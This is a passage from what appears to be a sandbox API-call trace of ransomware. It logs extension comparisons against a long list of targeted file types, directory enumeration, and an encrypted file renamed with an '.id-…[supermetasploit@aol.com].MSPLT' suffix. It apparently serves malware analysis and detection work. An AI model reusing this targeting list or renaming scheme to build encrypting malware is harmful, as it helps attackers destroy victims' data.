lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".cr2") returned 4 [0169.055] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".crt") returned 4 [0169.055] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".crw") returned 4 [0169.055] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".cs") returned 3 [0169.055] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0169.055] lstrlenW (lpString=".css") returned 4 [0169.055] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".csv") returned 4 [0169.055] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".cub") returned 4 [0169.055] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".dae") returned 4 [0169.055] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".dat") returned 4 [0169.055] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".db") returned 3 [0169.055] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0169.055] lstrlenW (lpString=".dbf") returned 4 [0169.055] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0169.055] lstrlenW (lpString=".dbx") returned 4 [0169.056] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".dc3") returned 4 [0169.056] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".dcm") returned 4 [0169.056] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".dcr") returned 4 [0169.056] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".der") returned 4 [0169.056] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".dib") returned 4 [0169.056] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".dic") returned 4 [0169.056] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".dif") returned 4 [0169.056] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".divx") returned 5 [0169.056] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0169.056] lstrlenW (lpString=".djvu") returned 5 [0169.056] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0169.056] lstrlenW (lpString=".dng") returned 4 [0169.056] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".doc") returned 4 [0169.056] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0169.056] lstrlenW (lpString=".docm") returned 5 [0169.056] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0169.056] lstrlenW (lpString=".docx") returned 5 [0169.056] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0169.057] lstrlenW (lpString=".dot") returned 4 [0169.057] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".dotm") returned 5 [0169.057] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0169.057] lstrlenW (lpString=".dotx") returned 5 [0169.057] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0169.057] lstrlenW (lpString=".dpx") returned 4 [0169.057] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".dqy") returned 4 [0169.057] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".dsn") returned 4 [0169.057] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".dt") returned 3 [0169.057] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0169.057] lstrlenW (lpString=".dtd") returned 4 [0169.057] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".dwg") returned 4 [0169.057] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".dwt") returned 4 [0169.057] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".dx") returned 3 [0169.057] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0169.057] lstrlenW (lpString=".dxf") returned 4 [0169.057] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".edml") returned 5 [0169.057] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0169.057] lstrlenW (lpString=".efd") returned 4 [0169.057] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0169.057] lstrlenW (lpString=".elf") returned 4 [0169.058] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".emf") returned 4 [0169.058] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".emz") returned 4 [0169.058] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".epf") returned 4 [0169.058] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".eps") returned 4 [0169.058] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".epsf") returned 5 [0169.058] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0169.058] lstrlenW (lpString=".epsp") returned 5 [0169.058] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0169.058] lstrlenW (lpString=".erf") returned 4 [0169.058] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".exr") returned 4 [0169.058] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".f4v") returned 4 [0169.058] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".fido") returned 5 [0169.058] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0169.058] lstrlenW (lpString=".flm") returned 4 [0169.058] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".flv") returned 4 [0169.058] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".frm") returned 4 [0169.058] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0169.058] lstrlenW (lpString=".fxg") returned 4 [0169.058] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".geo") returned 4 [0169.059] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".gif") returned 4 [0169.059] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".grs") returned 4 [0169.059] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".gz") returned 3 [0169.059] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0169.059] lstrlenW (lpString=".h") returned 2 [0169.059] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0169.059] lstrlenW (lpString=".hdr") returned 4 [0169.059] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".hpp") returned 4 [0169.059] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".hta") returned 4 [0169.059] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".htc") returned 4 [0169.059] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".htm") returned 4 [0169.059] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".html") returned 5 [0169.059] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0169.059] lstrlenW (lpString=".icb") returned 4 [0169.059] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".ics") returned 4 [0169.059] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".iff") returned 4 [0169.059] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0169.059] lstrlenW (lpString=".inc") returned 4 [0169.060] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".indd") returned 5 [0169.060] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0169.060] lstrlenW (lpString=".ini") returned 4 [0169.060] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".iqy") returned 4 [0169.060] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".j2c") returned 4 [0169.060] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".j2k") returned 4 [0169.060] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".java") returned 5 [0169.060] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0169.060] lstrlenW (lpString=".jp2") returned 4 [0169.060] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".jpc") returned 4 [0169.060] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".jpe") returned 4 [0169.060] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".jpeg") returned 5 [0169.060] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0169.060] lstrlenW (lpString=".jpf") returned 4 [0169.060] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".jpg") returned 4 [0169.060] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".jpx") returned 4 [0169.060] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0169.060] lstrlenW (lpString=".js") returned 3 [0169.060] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0169.061] lstrlenW (lpString=".jsf") returned 4 [0169.061] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".json") returned 5 [0169.061] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0169.061] lstrlenW (lpString=".jsp") returned 4 [0169.061] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".kdc") returned 4 [0169.061] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".kmz") returned 4 [0169.061] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".kwm") returned 4 [0169.061] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".lasso") returned 6 [0169.061] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0169.061] lstrlenW (lpString=".lbi") returned 4 [0169.061] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".lgf") returned 4 [0169.061] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".lgp") returned 4 [0169.061] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".log") returned 4 [0169.061] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".m1v") returned 4 [0169.061] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".m4a") returned 4 [0169.061] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".m4v") returned 4 [0169.061] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0169.061] lstrlenW (lpString=".max") returned 4 [0169.062] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".md") returned 3 [0169.062] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0169.062] lstrlenW (lpString=".mda") returned 4 [0169.062] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mdb") returned 4 [0169.062] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mde") returned 4 [0169.062] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mdf") returned 4 [0169.062] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mdw") returned 4 [0169.062] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mef") returned 4 [0169.062] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mft") returned 4 [0169.062] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mfw") returned 4 [0169.062] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mht") returned 4 [0169.062] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mhtml") returned 6 [0169.062] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0169.062] lstrlenW (lpString=".mka") returned 4 [0169.062] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0169.062] lstrlenW (lpString=".mkidx") returned 6 [0169.062] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0169.062] lstrlenW (lpString=".mkv") returned 4 [0169.063] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".mos") returned 4 [0169.063] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".mov") returned 4 [0169.063] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".mp3") returned 4 [0169.063] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".mp4") returned 4 [0169.063] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".mpeg") returned 5 [0169.063] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0169.063] lstrlenW (lpString=".mpg") returned 4 [0169.063] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".mpv") returned 4 [0169.063] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".mrw") returned 4 [0169.063] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".msg") returned 4 [0169.063] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".mxl") returned 4 [0169.063] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".myd") returned 4 [0169.063] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".myi") returned 4 [0169.063] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".nef") returned 4 [0169.063] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0169.063] lstrlenW (lpString=".nrw") returned 4 [0169.063] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".obj") returned 4 [0169.064] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".odb") returned 4 [0169.064] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".odc") returned 4 [0169.064] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".odm") returned 4 [0169.064] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".odp") returned 4 [0169.064] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".ods") returned 4 [0169.064] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".oft") returned 4 [0169.064] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".one") returned 4 [0169.064] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".onepkg") returned 7 [0169.064] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0169.064] lstrlenW (lpString=".onetoc2") returned 8 [0169.064] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0169.064] lstrlenW (lpString=".opt") returned 4 [0169.064] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".oqy") returned 4 [0169.064] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".orf") returned 4 [0169.064] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".p12") returned 4 [0169.064] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0169.064] lstrlenW (lpString=".p7b") returned 4 [0169.065] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".p7c") returned 4 [0169.065] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pam") returned 4 [0169.065] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pbm") returned 4 [0169.065] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pct") returned 4 [0169.065] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pcx") returned 4 [0169.065] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pdd") returned 4 [0169.065] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pdf") returned 4 [0169.065] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pdp") returned 4 [0169.065] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pef") returned 4 [0169.065] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pem") returned 4 [0169.065] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pff") returned 4 [0169.065] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pfm") returned 4 [0169.065] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pfx") returned 4 [0169.065] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0169.065] lstrlenW (lpString=".pgm") returned 4 [0169.065] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0169.066] lstrlenW (lpString=".php") returned 4 [0169.066] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0169.066] lstrlenW (lpString=".php3") returned 5 [0169.066] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0169.066] lstrlenW (lpString=".php4") returned 5 [0169.066] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0169.066] lstrlenW (lpString=".php5") returned 5 [0169.066] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0169.066] lstrlenW (lpString=".phtml") returned 6 [0169.066] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0169.066] lstrlenW (lpString=".pict") returned 5 [0169.066] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0169.066] lstrlenW (lpString=".pl") returned 3 [0169.066] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0169.066] lstrlenW (lpString=".pls") returned 4 [0169.066] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0169.066] lstrlenW (lpString=".pm") returned 3 [0169.066] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0169.066] lstrlenW (lpString=".png") returned 4 [0169.066] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0169.066] lstrlenW (lpString=".pnm") returned 4 [0169.066] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0169.066] lstrlenW (lpString=".pot") returned 4 [0169.066] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0169.066] lstrlenW (lpString=".potm") returned 5 [0169.066] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0169.066] lstrlenW (lpString=".potx") returned 5 [0169.066] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0169.066] lstrlenW (lpString=".ppa") returned 4 [0169.066] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".ppam") returned 5 [0169.067] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0169.067] lstrlenW (lpString=".ppm") returned 4 [0169.067] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".pps") returned 4 [0169.067] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".ppsm") returned 5 [0169.067] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0169.067] lstrlenW (lpString=".ppt") returned 4 [0169.067] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".pptm") returned 5 [0169.067] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0169.067] lstrlenW (lpString=".pptx") returned 5 [0169.067] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0169.067] lstrlenW (lpString=".prn") returned 4 [0169.067] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".ps") returned 3 [0169.067] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0169.067] lstrlenW (lpString=".psb") returned 4 [0169.067] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".psd") returned 4 [0169.067] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".pst") returned 4 [0169.067] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".ptx") returned 4 [0169.067] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0169.067] lstrlenW (lpString=".pub") returned 4 [0169.067] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0169.068] lstrlenW (lpString=".pwm") returned 4 [0169.068] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0169.068] lstrlenW (lpString=".pxr") returned 4 [0169.068] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0169.068] lstrlenW (lpString=".py") returned 3 [0169.068] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0169.068] lstrlenW (lpString=".qt") returned 3 [0169.068] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0169.068] lstrlenW (lpString=".r3d") returned 4 [0169.068] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0169.068] lstrlenW (lpString=".raf") returned 4 [0169.068] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0169.068] lstrlenW (lpString=".rar") returned 4 [0169.068] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0169.068] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59ded2ec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59ded2ec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59ded2ec, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13d46, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0169.068] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.068] FindNextFileW (in: hFindFile=0x8022d8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.069] FindClose (in: hFindFile=0x8022d8 | out: hFindFile=0x8022d8) returned 1 [0169.069] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0169.069] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0169.069] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0169.069] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030") returned 26 [0169.069] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802118 [0169.069] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.069] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59e13571, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, 